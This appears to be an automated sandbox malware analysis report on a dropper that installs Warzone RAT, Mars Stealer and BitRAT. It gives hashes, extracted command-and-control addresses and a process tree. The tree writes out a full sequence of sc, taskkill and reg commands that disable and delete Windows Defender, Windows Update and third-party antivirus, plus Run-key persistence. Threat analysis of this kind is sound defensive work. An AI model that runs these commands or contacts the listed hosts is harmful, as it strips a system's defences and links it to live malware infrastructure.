Analysis
-
max time kernel
146s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
03-01-2023 19:42
Static task
static1
Behavioral task
behavioral1
Sample
Installerx64/Installerx32.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Installerx64/Installerx32.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
Installerx64/Installerx64.exe
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
Installerx64/Installerx64.exe
Resource
win10v2004-20221111-en
General
-
Target
Installerx64/Installerx32.exe
-
Size
2.1MB
-
MD5
592bef1e0325ada505ec4875d5727bc1
-
SHA1
d6c6aa187d2b5aaff512c12948a426584382e92c
-
SHA256
83b8c34a7c66b407be941e59a9ce7a84ee81a8dfad3cea67e86118e96221c749
-
SHA512
38410a737b63a6cf123b08b74e836e75189ce6dae8d4491b4deab5791eff29a824be24d3d70a53ccaf3137222d79253385be5180fffc1e98a0a9c11b1b1e8d3e
-
SSDEEP
49152:tBUOgQLgF1CiOBInpLNAZpCY3iEO+IVG5r:nU7CCtOmFNAP6O
Malware Config
Extracted
warzonerat
45.139.105.147:5200
Extracted
marsstealer
Default
data.topababa.com/gate.php
Extracted
bitrat
1.38
45.139.105.147:1234
-
communication_password
81dc9bdb52d04dc20036dbd8313ed055
-
install_dir
temp
-
install_file
svchost
-
tor_process
tor
Signatures
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security reg.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT payload 6 IoCs
Processes:
resource yara_rule \Program Files\Microsoft.exe warzonerat \Program Files\Microsoft.exe warzonerat \Program Files\Microsoft.exe warzonerat \Program Files\Microsoft.exe warzonerat C:\Program Files\Microsoft.exe warzonerat C:\Program Files\Microsoft.exe warzonerat -
Executes dropped EXE 5 IoCs
Processes:
Microsoft.exeBuilded.exeinstallerX32.exeInstallerX64.exeMicrosoft office.exepid process 576 Microsoft.exe 584 Builded.exe 608 installerX32.exe 1640 InstallerX64.exe 2016 Microsoft office.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 18 IoCs
Processes:
Installerx32.exepid process 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe 1996 Installerx32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Microsoft office.exeMicrosoft.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" Microsoft office.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" Microsoft.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
Microsoft office.exepid process 2016 Microsoft office.exe 2016 Microsoft office.exe 2016 Microsoft office.exe 2016 Microsoft office.exe -
Drops file in Program Files directory 57 IoCs
Processes:
cmd.exeInstallerx32.exedescription ioc process File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File created C:\Program Files\installerX32.exe Installerx32.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File created C:\Program Files\Builded.exe Installerx32.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\InstallerX64.exe Installerx32.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\installerX32.exe Installerx32.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File created C:\Program Files\Microsoft.exe Installerx32.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File created C:\Program Files\__tmp_rar_sfx_access_check_7080183 Installerx32.exe File created C:\Program Files\Microsoft office.exe Installerx32.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Microsoft office.exe Installerx32.exe File opened for modification C:\Program Files\Builded.exe Installerx32.exe File created C:\Program Files\InstallerX64.exe Installerx32.exe File opened for modification C:\Program Files\Microsoft.exe Installerx32.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe -
Launches sc.exe 50 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1508 sc.exe 268 sc.exe 1712 sc.exe 1204 sc.exe 1900 sc.exe 1540 sc.exe 108 sc.exe 1840 sc.exe 1728 sc.exe 948 sc.exe 340 sc.exe 1236 sc.exe 1352 sc.exe 1948 sc.exe 1084 sc.exe 1004 sc.exe 1948 sc.exe 1148 sc.exe 940 sc.exe 972 sc.exe 848 sc.exe 564 sc.exe 1988 sc.exe 1676 sc.exe 1956 sc.exe 568 sc.exe 828 sc.exe 1656 sc.exe 1508 sc.exe 828 sc.exe 924 sc.exe 1208 sc.exe 1676 sc.exe 1776 sc.exe 1740 sc.exe 1412 sc.exe 1752 sc.exe 1636 sc.exe 772 sc.exe 1108 sc.exe 1780 sc.exe 776 sc.exe 1172 sc.exe 928 sc.exe 1628 sc.exe 1112 sc.exe 1920 sc.exe 1688 sc.exe 996 sc.exe 1708 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1676 taskkill.exe 568 taskkill.exe 1904 taskkill.exe 848 taskkill.exe 1172 taskkill.exe 1336 taskkill.exe 1744 taskkill.exe 948 taskkill.exe 1220 taskkill.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 26 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exepid process 772 reg.exe 1820 reg.exe 1784 reg.exe 1528 reg.exe 1540 reg.exe 704 reg.exe 1992 reg.exe 1836 reg.exe 1572 reg.exe 1932 reg.exe 1032 reg.exe 1240 reg.exe 1280 reg.exe 536 reg.exe 1148 sc.exe 828 sc.exe 268 sc.exe 1904 taskkill.exe 1780 sc.exe 940 sc.exe 1840 sc.exe 848 taskkill.exe 1712 sc.exe 924 sc.exe 1208 sc.exe 1220 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
taskkill.exeMicrosoft office.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1172 taskkill.exe Token: SeDebugPrivilege 2016 Microsoft office.exe Token: SeShutdownPrivilege 2016 Microsoft office.exe Token: SeDebugPrivilege 1336 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeDebugPrivilege 948 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 568 taskkill.exe Token: SeDebugPrivilege 1904 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Microsoft office.exepid process 2016 Microsoft office.exe 2016 Microsoft office.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Installerx32.exeinstallerX32.execmd.exedescription pid process target process PID 1996 wrote to memory of 576 1996 Installerx32.exe Microsoft.exe PID 1996 wrote to memory of 576 1996 Installerx32.exe Microsoft.exe PID 1996 wrote to memory of 576 1996 Installerx32.exe Microsoft.exe PID 1996 wrote to memory of 576 1996 Installerx32.exe Microsoft.exe PID 1996 wrote to memory of 584 1996 Installerx32.exe Builded.exe PID 1996 wrote to memory of 584 1996 Installerx32.exe Builded.exe PID 1996 wrote to memory of 584 1996 Installerx32.exe Builded.exe PID 1996 wrote to memory of 584 1996 Installerx32.exe Builded.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 608 1996 Installerx32.exe installerX32.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 1996 wrote to memory of 1640 1996 Installerx32.exe InstallerX64.exe PID 608 wrote to memory of 872 608 installerX32.exe cmd.exe PID 608 wrote to memory of 872 608 installerX32.exe cmd.exe PID 608 wrote to memory of 872 608 installerX32.exe cmd.exe PID 608 wrote to memory of 872 608 installerX32.exe cmd.exe PID 1996 wrote to memory of 2016 1996 Installerx32.exe Microsoft office.exe PID 1996 wrote to memory of 2016 1996 Installerx32.exe Microsoft office.exe PID 1996 wrote to memory of 2016 1996 Installerx32.exe Microsoft office.exe PID 1996 wrote to memory of 2016 1996 Installerx32.exe Microsoft office.exe PID 872 wrote to memory of 1656 872 cmd.exe sc.exe PID 872 wrote to memory of 1656 872 cmd.exe sc.exe PID 872 wrote to memory of 1656 872 cmd.exe sc.exe PID 872 wrote to memory of 1352 872 cmd.exe sc.exe PID 872 wrote to memory of 1352 872 cmd.exe sc.exe PID 872 wrote to memory of 1352 872 cmd.exe sc.exe PID 872 wrote to memory of 1508 872 cmd.exe sc.exe PID 872 wrote to memory of 1508 872 cmd.exe sc.exe PID 872 wrote to memory of 1508 872 cmd.exe sc.exe PID 872 wrote to memory of 828 872 cmd.exe sc.exe PID 872 wrote to memory of 828 872 cmd.exe sc.exe PID 872 wrote to memory of 828 872 cmd.exe sc.exe PID 872 wrote to memory of 1948 872 cmd.exe sc.exe PID 872 wrote to memory of 1948 872 cmd.exe sc.exe PID 872 wrote to memory of 1948 872 cmd.exe sc.exe PID 872 wrote to memory of 776 872 cmd.exe sc.exe PID 872 wrote to memory of 776 872 cmd.exe sc.exe PID 872 wrote to memory of 776 872 cmd.exe sc.exe PID 872 wrote to memory of 1172 872 cmd.exe sc.exe PID 872 wrote to memory of 1172 872 cmd.exe sc.exe PID 872 wrote to memory of 1172 872 cmd.exe sc.exe PID 872 wrote to memory of 928 872 cmd.exe sc.exe PID 872 wrote to memory of 928 872 cmd.exe sc.exe PID 872 wrote to memory of 928 872 cmd.exe sc.exe PID 872 wrote to memory of 1688 872 cmd.exe sc.exe PID 872 wrote to memory of 1688 872 cmd.exe sc.exe PID 872 wrote to memory of 1688 872 cmd.exe sc.exe PID 872 wrote to memory of 972 872 cmd.exe sc.exe PID 872 wrote to memory of 972 872 cmd.exe sc.exe PID 872 wrote to memory of 972 872 cmd.exe sc.exe PID 872 wrote to memory of 996 872 cmd.exe sc.exe PID 872 wrote to memory of 996 872 cmd.exe sc.exe PID 872 wrote to memory of 996 872 cmd.exe sc.exe PID 872 wrote to memory of 1988 872 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Program Files\Microsoft.exe"C:\Program Files\Microsoft.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"3⤵PID:1280
-
C:\Program Files\Builded.exe"C:\Program Files\Builded.exe"2⤵
- Executes dropped EXE
PID:584 -
C:\Program Files\installerX32.exe"C:\Program Files\installerX32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat "C:\Program Files\installerX32.exe""3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\sc.exesc config windefend start= disabled4⤵
- Launches sc.exe
PID:1352 -
C:\Windows\system32\sc.exesc stop windefend4⤵
- Launches sc.exe
PID:1656 -
C:\Windows\system32\sc.exesc delete windefend4⤵
- Launches sc.exe
PID:1508 -
C:\Windows\system32\sc.exesc stop WdNisSvc4⤵
- Launches sc.exe
PID:828 -
C:\Windows\system32\sc.exesc config WdNisSvc start= disabled4⤵
- Launches sc.exe
PID:1948 -
C:\Windows\system32\sc.exesc delete WdNisSvc4⤵
- Launches sc.exe
PID:776 -
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:1172 -
C:\Windows\system32\sc.exesc config Sense start= disabled4⤵
- Launches sc.exe
PID:928 -
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:1688 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:972 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
- Launches sc.exe
PID:996 -
C:\Windows\system32\sc.exesc stop usosvc4⤵
- Launches sc.exe
PID:1988 -
C:\Windows\system32\sc.exesc config usosvc start= disabled4⤵
- Launches sc.exe
PID:1776 -
C:\Windows\system32\sc.exesc stop WaasMedicSvc4⤵
- Launches sc.exe
PID:1084 -
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled4⤵
- Launches sc.exe
PID:848 -
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:1752 -
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled4⤵
- Launches sc.exe
PID:1204 -
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:1728 -
C:\Windows\system32\sc.exesc stop SDRSVC4⤵
- Launches sc.exe
PID:1740 -
C:\Windows\system32\sc.exesc config SDRSVC start= disabled4⤵
- Launches sc.exe
PID:948 -
C:\Windows\system32\sc.exesc stop wscsvc4⤵
- Launches sc.exe
PID:1636 -
C:\Windows\system32\sc.exesc config wscsvc start= disabled4⤵
- Launches sc.exe
PID:1676 -
C:\Windows\system32\sc.exesc stop WdiServiceHost4⤵
- Launches sc.exe
PID:1956 -
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled4⤵
- Launches sc.exe
PID:568 -
C:\Windows\system32\sc.exesc stop WdiSystemHost4⤵
- Launches sc.exe
PID:564 -
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled4⤵
- Launches sc.exe
PID:772 -
C:\Windows\system32\sc.exesc stop InstallService4⤵
- Launches sc.exe
PID:1412 -
C:\Windows\system32\sc.exesc config InstallService Start= disabled4⤵
- Launches sc.exe
PID:1900 -
C:\Windows\system32\sc.exesc stop VaultSvc4⤵
- Launches sc.exe
PID:1540 -
C:\Windows\system32\sc.exesc config VaultSvc start= disabled4⤵
- Launches sc.exe
PID:340 -
C:\Windows\system32\sc.exesc stop Spooler4⤵
- Launches sc.exe
PID:1708 -
C:\Windows\system32\sc.exesc config Spooler start= disabled4⤵
- Launches sc.exe
PID:108 -
C:\Windows\system32\sc.exesc stop LicenseManager4⤵
- Launches sc.exe
PID:1508 -
C:\Windows\system32\sc.exesc config LicenseManager start= disabled4⤵
- Launches sc.exe
PID:1004 -
C:\Windows\system32\sc.exesc stop DiagTrack4⤵
- Launches sc.exe
PID:1948 -
C:\Windows\system32\sc.exesc config DiagTrack start= disabled4⤵
- Launches sc.exe
PID:1108 -
C:\Windows\system32\taskkill.exetaskkill /f /im smartscreen.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172 -
C:\Windows\system32\taskkill.exetaskkill /f /im SecurityHealthService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\system32\taskkill.exetaskkill /f /im MpCopyAccelerator.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\system32\taskkill.exetaskkill /f /im MpCopyAccelerator.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Windows\System32\taskkill.exetaskkill /f /im SecurityHealthService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\system32\taskkill.exetaskkill /f /im SystemSettings.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:772 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1820 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1784 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1528 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1540 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:704 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1992 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1836 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1572 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1932 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1032 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1240 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f4⤵
- Modifies security service
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1280 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:536 -
C:\Windows\SysWOW64\sc.exesc delete windefend4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1148 -
C:\Windows\SysWOW64\sc.exesc delete sense4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:828 -
C:\Windows\SysWOW64\sc.exesc stop nsWscSvc4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:268 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MBAMWsc.exe4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\SysWOW64\sc.exesc stop MBAMService4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1780 -
C:\Windows\SysWOW64\sc.exesc config MBAMService start= disabled4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:940 -
C:\Windows\SysWOW64\sc.exesc delete MBAMService4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1840 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MBAM.exe4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\SysWOW64\sc.exesc stop Bytefenceservice4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1712 -
C:\Windows\SysWOW64\sc.exesc config Bytefenceservice start= disabled4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:924 -
C:\Windows\SysWOW64\sc.exesc delete Bytefenceservice4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1208 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Bytefence.exe4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1220 -
C:\Windows\system32\sc.exesc stop "avast! Tools"4⤵
- Launches sc.exe
PID:1628 -
C:\Windows\system32\sc.exesc config "avast! Tools" start= disabled4⤵
- Launches sc.exe
PID:1236 -
C:\Windows\system32\sc.exesc delete "avast! Tools"4⤵
- Launches sc.exe
PID:1112 -
C:\Windows\system32\sc.exesc stop "avast! Antivirus"4⤵
- Launches sc.exe
PID:1676 -
C:\Windows\system32\sc.exesc config "avast! Antivirus" start= disabled4⤵
- Launches sc.exe
PID:1920 -
C:\Program Files\InstallerX64.exe"C:\Program Files\InstallerX64.exe"2⤵
- Executes dropped EXE
PID:1640 -
C:\Program Files\Microsoft office.exe"C:\Program Files\Microsoft office.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2016
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding1⤵PID:628
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
159KB
MD5361356a7a0a38b3080b298ff8f3b8c9d
SHA11763fa71f4cd842a84600b47ee9b436c417f5c1f
SHA256b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a
SHA5120e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8
-
Filesize
91KB
MD5cc3db2432720f58955baa76ab4708a18
SHA1256923ae3d9888262be5c548b553182c4400674a
SHA256023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096
SHA512ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82
-
Filesize
3.8MB
MD52bc19dd96b42cea3280eb5fe1e949b82
SHA1d4daeaa890659239a848d36b34e1c5b0d150c42f
SHA2566d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205
SHA512e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b
-
Filesize
3.8MB
MD52bc19dd96b42cea3280eb5fe1e949b82
SHA1d4daeaa890659239a848d36b34e1c5b0d150c42f
SHA2566d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205
SHA512e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b
-
Filesize
132KB
MD55cf52aea15ebdef8a216f5a3d4f44c73
SHA1b7394c7347b84db2d878e9deb260862d51023dd4
SHA256479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078
SHA512230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b
-
Filesize
132KB
MD55cf52aea15ebdef8a216f5a3d4f44c73
SHA1b7394c7347b84db2d878e9deb260862d51023dd4
SHA256479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078
